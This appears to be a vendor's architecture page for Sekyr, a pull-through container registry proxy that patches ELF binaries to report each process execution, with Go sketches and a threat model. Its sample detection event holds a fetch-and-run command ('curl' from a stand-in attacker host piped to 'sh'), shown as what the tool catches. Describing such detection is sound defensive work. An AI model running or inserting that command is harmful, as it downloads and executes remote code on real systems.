01
Architecture

Where Sekyr sits.

Sekyr is a pull-through proxy that sits between your orchestrator and the upstream registry. You still push images to your own registry; your orchestrator pulls them through us. On first pull we analyze the image, patch every ELF binary we find, and ship the result back with one extra layer on top of the original. Repeat pulls hit the cache and pass through unchanged.
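As an illustration of what "pulls them through us" means in practice, here is a minimal Go sketch of rewriting a fully qualified image reference so the pull goes through the cache. The sekyr.cloud/<alias>/ prefix and the alias table are assumptions inferred from the event example later on this page, not the real configuration.

package main

import (
	"fmt"
	"strings"
)

// rewriteRef prefixes a fully qualified image reference so the pull goes
// through the Sekyr cache instead of straight to the upstream registry.
// The "sekyr.cloud/<alias>/" convention here is illustrative only.
func rewriteRef(ref string) (string, error) {
	host, rest, ok := strings.Cut(ref, "/")
	if !ok {
		return "", fmt.Errorf("expected a fully qualified reference, got %q", ref)
	}
	// Hypothetical upstream aliases; the real mapping is account configuration.
	aliases := map[string]string{
		"ghcr.io":   "ghcr",
		"docker.io": "hub",
	}
	alias, known := aliases[host]
	if !known {
		alias = host // unknown upstreams pass through under their own name
	}
	return "sekyr.cloud/" + alias + "/" + rest, nil
}

func main() {
	ref, _ := rewriteRef("ghcr.io/acme/api:1.4.2")
	fmt.Println(ref) // sekyr.cloud/ghcr/acme/api:1.4.2
}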

[Diagram] Upstream image registry (ghcr · ECR · Hub · GAR, unmodified) → Sekyr pull-through cache (scan: find ELF binaries · patch: add observation code to ELF binaries · overlay: +1 layer + reporter · cache: content-addressed) → your cluster (orchestrator: k8s · ECS · Nomad; workloads run the image + patched-bin layer). Events flow from the workloads to the control plane at sekyr.cloud (analysis · search · alerting; behavioural detection over the event stream).

  • Pull path: original image + one added layer
  • Event stream: from the side reporter, when a patched binary runs
  • Sekyr surface: pull-through cache + control plane
02
Pull lifecycle

What happens on docker pull.

From the client's perspective, this is a normal OCI pull. Pushes still go to your upstream registry; we never accept them. Inside the cache, four steps run on first pull before the manifest is returned. Repeat pulls of the same digest are a cache hit. We do not touch signatures, do not check provenance against any allowlist, and do not modify your original layers.

  1. Scan

    Walk the image. Identify every ELF binary inside it: shells, package binaries under /usr/bin, busybox applets, language runtimes, anything that can be exec’d. A minimal sketch of this detection step follows the list.

  2. Patch

    Add a small observation routine to each ELF binary in the image. The routine sits dormant until the binary is executed; when it is, the routine wakes up alongside the binary and forks a small reporter side-process that emits one event and exits.

  3. Overlay

    Wrap the patched copies and the reporter into a single extra layer on top of the existing image. Original layers are byte-for-byte unchanged. The entrypoint is not rewritten; signatures and provenance are not touched.

  4. Deliver

    Serve the original image plus our one added layer. Same OCI protocol, same digest verification. Subsequent pulls hit the content-addressed cache.
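For illustration only, a minimal Go sketch of the scan step above: walk an unpacked rootfs and flag every regular file that starts with the ELF magic bytes. The ./rootfs path is a stand-in, and the sketch ignores the symlink, hard-link, and layer-by-layer handling a real scan has to deal with.

package main

import (
	"bytes"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
)

var elfMagic = []byte{0x7f, 'E', 'L', 'F'}

// findELF walks an unpacked image rootfs and returns every regular file
// that starts with the ELF magic bytes. A sketch, not the real scanner.
func findELF(root string) ([]string, error) {
	var hits []string
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil || !d.Type().IsRegular() {
			return err
		}
		f, err := os.Open(path)
		if err != nil {
			return nil // unreadable files are simply skipped here
		}
		defer f.Close()
		magic := make([]byte, 4)
		if n, _ := f.Read(magic); n == 4 && bytes.Equal(magic, elfMagic) {
			hits = append(hits, path)
		}
		return nil
	})
	return hits, err
}

func main() {
	hits, err := findELF("./rootfs") // hypothetical unpacked image root
	if err != nil {
		panic(err)
	}
	for _, h := range hits {
		fmt.Println(h)
	}
}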

03
Runtime lifecycle

What runs at runtime. Almost nothing.

Sekyr is agentless. There is no daemon on the host, no PID 1 supervisor in the container, no syscall funnel. The patched binaries run as themselves. The execution of one of those binaries IS the event we care about; that is what wakes the observation code and forks a small reporter side-process that sends one event and exits. Long-running idle workloads cost nothing.

[Diagram] Inside the container, the patched binary (in the image) runs as itself; execution wakes the observation code, which fork()s a transient side reporter (forked on each execution, exits after send) that delivers its event to the Sekyr analysis engine (behavioural analysis · alerting · search).
01 Exec
Container starts your original entrypoint, untouched. The entrypoint itself is not patched; it runs exactly as it did before. From there it execs into the binaries inside the image, which is where the hook sites live.
02 Hit
Whenever a patched binary is executed, our observation code runs with it. The execution itself is the event; there is nothing to look for.
03 Fork
The observation code fork()s a tiny reporter. The parent binary keeps running with no observable delay. The reporter is a separate process, not a thread, not a tracer.
04 Report
The reporter snapshots the run: binary path, argv, argv[0], parent PID chain back to PID 1, non-sensitive environment, and the network connections currently open for that process. It packages all of it into one event and ships it back to the Sekyr analysis engine. The destination is ours, not your observability stack. A sketch of that snapshot follows this list.
05 Exit
Reporter exits. No persistent process. No watched file descriptors. Nothing left running until the next patched binary is executed.
06 Idle
A workload that is just sitting there, not executing any patched binaries, emits nothing. A long-running service that booted once and is now waiting on I/O is invisible to Sekyr.
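To make the Report step concrete, here is a minimal Go sketch of the kind of snapshot a reporter could take on Linux: the current binary, argv, and the parent PID chain walked from /proc up to PID 1, packaged as one JSON event. Field names loosely mirror the event example in the Observability section; the transport back to the analysis engine is omitted.

package main

import (
	"encoding/json"
	"fmt"
	"os"
	"strconv"
	"strings"
)

type parent struct {
	PID  int    `json:"pid"`
	Comm string `json:"comm"`
	Exe  string `json:"exe"`
}

type event struct {
	Event   string   `json:"event"`
	Path    string   `json:"path"`
	Argv    []string `json:"argv"`
	Parents []parent `json:"parents"`
}

// parentChain walks /proc from pid up to PID 1 via the ppid field of
// /proc/<pid>/stat. Readlink on another process's exe can fail without
// permission; the sketch just records an empty string in that case.
func parentChain(pid int) []parent {
	var chain []parent
	for pid >= 1 {
		comm, _ := os.ReadFile(fmt.Sprintf("/proc/%d/comm", pid))
		exe, _ := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
		chain = append(chain, parent{PID: pid, Comm: strings.TrimSpace(string(comm)), Exe: exe})
		if pid == 1 {
			break
		}
		stat, err := os.ReadFile(fmt.Sprintf("/proc/%d/stat", pid))
		if err != nil {
			break
		}
		// Format is "pid (comm) state ppid ..."; split after the closing
		// paren so spaces inside comm cannot shift the fields.
		s := string(stat)
		fields := strings.Fields(s[strings.LastIndexByte(s, ')')+1:])
		if len(fields) < 2 {
			break
		}
		ppid, err := strconv.Atoi(fields[1])
		if err != nil {
			break
		}
		pid = ppid
	}
	return chain
}

func main() {
	exe, _ := os.Readlink("/proc/self/exe")
	ev := event{
		Event:   "process.exec",
		Path:    exe,
		Argv:    os.Args,
		Parents: parentChain(os.Getpid()),
	}
	out, _ := json.MarshalIndent(ev, "", "  ")
	fmt.Println(string(out)) // a real reporter would ship this, then exit
}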
04
Coverage

What we listen for.

No profiles, no allowlists, no learning windows. Every patched binary carries the same observation code, and every execution of one of those binaries produces an event with the same shape. What we record is below.

Who is running

For every execution we capture the binary path, argv, argv[0], and the parent PID chain back to PID 1. Command injection shows up here, like a webserver suddenly running /bin/sh -c, a cron spawning curl, or a database forking a shell.

binary path · argv · argv[0] · parent chain

Network connections

For the same execution, we record the network connections that process has open. Catches workloads reaching addresses they have no business reaching, like exfiltration destinations, C2 endpoints, or internal services they should never touch. A sketch of reading those sockets from /proc follows below.

active sockets · destination ip:port · protocol
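A minimal Go sketch of how the open connections for a process can be read on Linux: collect the socket inodes from /proc/<pid>/fd, then match them against /proc/net/tcp. The hex address decode is left out; this shows one way the data can be gathered, not our exact implementation.

package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

// socketInodes returns the inode numbers of every socket the process has
// open, by reading the /proc/<pid>/fd symlinks.
func socketInodes(pid int) map[string]bool {
	inodes := map[string]bool{}
	fdDir := fmt.Sprintf("/proc/%d/fd", pid)
	entries, err := os.ReadDir(fdDir)
	if err != nil {
		return inodes
	}
	for _, e := range entries {
		target, err := os.Readlink(fdDir + "/" + e.Name())
		// Socket fds resolve to the form "socket:[12345]".
		if err == nil && strings.HasPrefix(target, "socket:[") {
			inodes[strings.TrimSuffix(strings.TrimPrefix(target, "socket:["), "]")] = true
		}
	}
	return inodes
}

func main() {
	inodes := socketInodes(os.Getpid())

	// Each /proc/net/tcp row carries the remote address (hex) and the
	// owning socket inode as its 10th whitespace-separated field.
	f, err := os.Open("/proc/net/tcp")
	if err != nil {
		panic(err)
	}
	defer f.Close()
	sc := bufio.NewScanner(f)
	sc.Scan() // skip the header line
	for sc.Scan() {
		fields := strings.Fields(sc.Text())
		if len(fields) > 9 && inodes[fields[9]] {
			fmt.Printf("remote=%s state=%s\n", fields[2], fields[3])
		}
	}
}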

Process context

Parent PID chain and non-sensitive environment variables go out with each event. Lets you reconstruct who spawned what, even when the chain crosses several short-lived processes. A sketch of the environment filtering follows below.

ppid chain · env (filtered) · cwd
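The env (filtered) field implies some variables never leave the workload. What counts as sensitive is not spelled out on this page, so the deny-list in this Go sketch is purely an assumption for illustration.

package main

import (
	"fmt"
	"os"
	"strings"
)

// filterEnv keeps only environment variables that do not look like
// secrets. The substring deny-list below is an assumption made for this
// sketch, not Sekyr's actual definition of "non-sensitive environment".
func filterEnv(environ []string) map[string]string {
	denySubstrings := []string{"SECRET", "TOKEN", "PASSWORD", "KEY", "CREDENTIAL"}
	safe := map[string]string{}
	for _, kv := range environ {
		k, v, ok := strings.Cut(kv, "=")
		if !ok {
			continue
		}
		upper := strings.ToUpper(k)
		sensitive := false
		for _, d := range denySubstrings {
			if strings.Contains(upper, d) {
				sensitive = true
				break
			}
		}
		if !sensitive {
			safe[k] = v
		}
	}
	return safe
}

func main() {
	fmt.Println(filterEnv(os.Environ()))
	// e.g. map[NODE_ENV:production PORT:8080], with AWS_SECRET_ACCESS_KEY dropped
}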
What we deliberately skip

We do not trace every syscall. read() / write() / mmap() in steady state are not interesting and are a guaranteed way to burn CPU. We watch the execution of binaries inside your image, which is the actual move an attacker has to make to traverse a system or run a command. It is not a syscall firehose.
05
Observability

One event per hook hit.

Every event has the same shape: what happened, where it was called from, who its parent was. The control plane is a search and alerting view over those events.

{
  "ts": "2026-04-26T14:22:08.412Z",
  "workload": "api-7f9c8d6b4-x2k7l",
  "image": "sekyr.cloud/ghcr/acme/api@sha256:f9c8d6b4...",
  "event": "process.exec",
  "exec": {
    "path": "/bin/sh",
    "argv": ["sh", "-c", "curl http://attacker.example/x | sh"],
    "cwd": "/app"
  },
  "parents": [
    { "pid": 412, "comm": "sh",     "exe": "/bin/sh" },
    { "pid": 411, "comm": "node",   "exe": "/usr/local/bin/node" },
    { "pid": 1,   "comm": "node",   "exe": "/usr/local/bin/node" }
  ],
  "env_safe": { "NODE_ENV": "production", "PORT": "8080" },
  "site": { "binary": "/usr/local/bin/node", "offset": "0x4f12" }
}
Where events go

Reporters ship events to the Sekyr analysis engine. We filter aggressively at ingest and deduplicate events we have already seen for the same image and call site, so only real, novel signals enter the analysis pipeline. We run the behavioural detection on top, so you don’t pipe the raw stream into your own SIEM and you don’t hand-write detection rules. Findings surface in the control plane and via webhooks or the alerting destination of your choice.
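A minimal Go sketch of the ingest-side deduplication described above, keyed on the image and the call site. The key fields mirror the image and site fields of the event example; the real pipeline's keying and retention policy are not published here.

package main

import "fmt"

// dedupKey identifies an event by the image it came from and the call
// site inside that image. Suppressing repeats of the same key is a
// sketch of the idea only.
type dedupKey struct {
	Image  string // image digest the workload was pulled from
	Binary string // patched binary inside that image
	Offset string // hook site offset within the binary
}

type deduper struct {
	seen map[dedupKey]int
}

func newDeduper() *deduper { return &deduper{seen: map[dedupKey]int{}} }

// observe returns true the first time a key is seen, false for repeats.
func (d *deduper) observe(k dedupKey) bool {
	d.seen[k]++
	return d.seen[k] == 1
}

func main() {
	d := newDeduper()
	k := dedupKey{
		Image:  "sha256:f9c8d6b4", // truncated for the example
		Binary: "/usr/local/bin/node",
		Offset: "0x4f12",
	}
	fmt.Println(d.observe(k)) // true  -> novel, enters the analysis pipeline
	fmt.Println(d.observe(k)) // false -> duplicate, filtered at ingest
}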

06
Performance

What this costs you. Almost nothing, most of the time.

The honest version: we don't have hard numbers to publish yet, but the shape of the cost is structural, not a tuning exercise. Here is where it sits relative to the alternatives.

01 Idle workloads cost zero.
No agent, no daemon, no syscall funnel. If no patched binary is executed, no event is produced and no work is done. Long-running services that booted once and are now waiting on I/O are invisible to Sekyr.
02 You pay per image conversion, not per pull.
Patching an image costs CPU once, when a new tag goes through Sekyr the first time. Repeat pulls of that digest hit the cache and are free. Your bill grows with the number of distinct images you ship, not with how many pods you run them in. A sketch of that cost shape follows this list.
03 Materially lower overhead than agent + eBPF setups.
Traditional container monitors run a privileged daemon on every host, attach eBPF programs on every node, and process every syscall on every container, whether or not it matters. That cost is constant and grows with your fleet. Sekyr only spends CPU when a patched binary is actually executed, and the analysis side filters and deduplicates aggressively before anything reaches a paid path.
04 Pull-time cost is a one-shot.
Scanning and patching the image happens once, server-side, in the cache. After that it is a normal cached pull. You wear the cost on first pull of a new tag, never on container start.
05 No host kernel state.
No kernel modules. No eBPF programs loaded into your kernel. No privileged daemonsets. We cannot leak memory in a place you can’t restart, because we are not in your host.
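A toy Go sketch of the cost shape from item 02: the cache is keyed on the upstream digest, so the conversion runs at most once per digest and every later pull is a lookup. The patch function here is a stand-in, not the real server-side conversion.

package main

import "fmt"

// cache maps an upstream digest to its already-patched manifest reference.
type cache struct {
	patched map[string]string
}

// pull returns the patched reference, converting only on the first pull
// of a given digest; every repeat is a cache hit.
func (c *cache) pull(digest string, patch func(string) string) (string, bool) {
	if ref, ok := c.patched[digest]; ok {
		return ref, true // cache hit: no conversion CPU spent
	}
	ref := patch(digest) // one-shot cost, paid on first pull of this digest
	c.patched[digest] = ref
	return ref, false
}

func main() {
	c := &cache{patched: map[string]string{}}
	patch := func(d string) string { return d + "+sekyr-layer" } // stand-in
	for i := 0; i < 3; i++ {
		ref, hit := c.pull("sha256:f9c8d6b4", patch)
		fmt.Println(ref, "cache hit:", hit)
	}
}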
07
Compatibility

What we run on.

Sekyr speaks OCI on the pull path. You keep using your existing registry for pushes; if it implements the OCI Distribution Spec on read and your runtime implements the OCI Runtime Spec, Sekyr fits in front of it.

Registries
  • Docker Hub tested
  • GitHub Container Registry tested
  • AWS ECR tested
  • Google Artifact Registry tested
  • GitLab Container Registry tested
  • Harbor compatible
  • Quay.io compatible
  • Self-hosted (any OCI dist) compatible
Orchestrators
  • Kubernetes 1.24+ tested
  • Amazon ECS tested
  • Nomad 1.6+ compatible
  • Docker / Compose tested
  • OpenShift 4.x compatible
Architectures
  • linux/amd64 tested
  • linux/arm64 tested
  • linux/arm/v7 compatible
  • Distroless base images tested
  • Alpine / musl tested
  • Scratch images tested
08
Threat model

Detection, not enforcement.

Sekyr is detection-only. We do not block, kill, or interfere with your workload; we just report. The lists below cover what we actually catch from observing binary executions, and what we deliberately don’t.

What we catch
  • Command injection, where a process execs a shell with attacker-controlled argv
  • Lateral movement, where workloads reach internal services they’ve never touched
  • Suspicious exec chains, like webserver → sh → curl → sh, or other anomalous parents
  • Unexpected outbound network dials to exfiltration destinations or C2 callbacks
  • Living-off-the-land, where busybox or coreutils binaries get used inside an image that doesn’t normally need them
  • Crypto-miner drop and run, where short-lived exec patterns betray payload delivery
What we don’t do
  • We do not block, kill, or signal processes. Detection only.
  • We do not catch attacks that never exec a binary or open a socket, so pure in-process memory corruption is invisible to us
  • We do not see statically-linked binaries the cache wasn’t able to identify (rare, but possible)
  • We do not protect against kernel-level exploits or rootkits; that is the host’s job
  • We do not stop build-time supply chain attacks before the image reaches the registry
  • We do not defend against malicious insiders with cluster-admin and event-pipeline rights
09
Comparison

Sekyr vs eBPF / agent-based container monitors.

Falco-style stacks put a privileged agent on every host and watch the kernel. We put the hooks inside the image, only spend CPU when something interesting actually happens, and let the analysis side filter and deduplicate before anything else. Different place to stand, different cost shape.

Our approach, Sekyr: detection inside the image.
Falco-style stacks, eBPF + agent monitors: a daemon on every host, in the kernel.

Where it runs (the point in the stack it lives in)
  • Sekyr: inside your image, as patched binaries + a transient reporter
  • Falco-style: on every host, as a privileged daemon + eBPF programs in the kernel

When it runs (when CPU time is actually spent)
  • Sekyr: only when a patched binary is executed inside a workload
  • Falco-style: continuously, on every syscall in every container, whether interesting or not

Idle workload cost (a quiet container doing nothing exotic)
  • Sekyr: effectively zero, with no daemon and no agent
  • Falco-style: constant baseline overhead from the daemon and probes

Coverage (what you have to install per node)
  • Sekyr: pull the image. Done.
  • Falco-style: daemonset + privileged agent on every node, kept current

Kernel footprint (what lands in the host kernel)
  • Sekyr: none. Userspace patches inside your image only.
  • Falco-style: eBPF programs attached to kernel hooks; kernel version sensitivity

Detection surface (where the hooks live)
  • Sekyr: every ELF binary inside the image: shells, busybox applets, /usr/bin/*, language runtimes (the entrypoint itself is left alone)
  • Falco-style: the host kernel, which sees everything, including things you don’t care about

Failure mode (what happens when it breaks)
  • Sekyr: workload runs as the original; events stop flowing
  • Falco-style: daemon crashes, probes detach; detection silently degrades on that node

What it sends home (the data shape on the wire)
  • Sekyr: one event per execution: who ran, parent chain, active network connections. Not a syscall firehose.
  • Falco-style: a configurable but typically large stream of syscall events to filter downstream
eBPF stands for Extended Berkeley Packet Filter: a way to attach small programs to kernel hooks. Powerful and ubiquitous; also constant overhead and kernel-version sensitive.

Agent is a long-running, usually privileged process per host. Has to be installed, kept current, and trusted with elevated permissions.
Try it

Read the docs. Pull an image. See what it does.

Start a free trial. No agent install, no orchestrator changes beyond a URL prefix.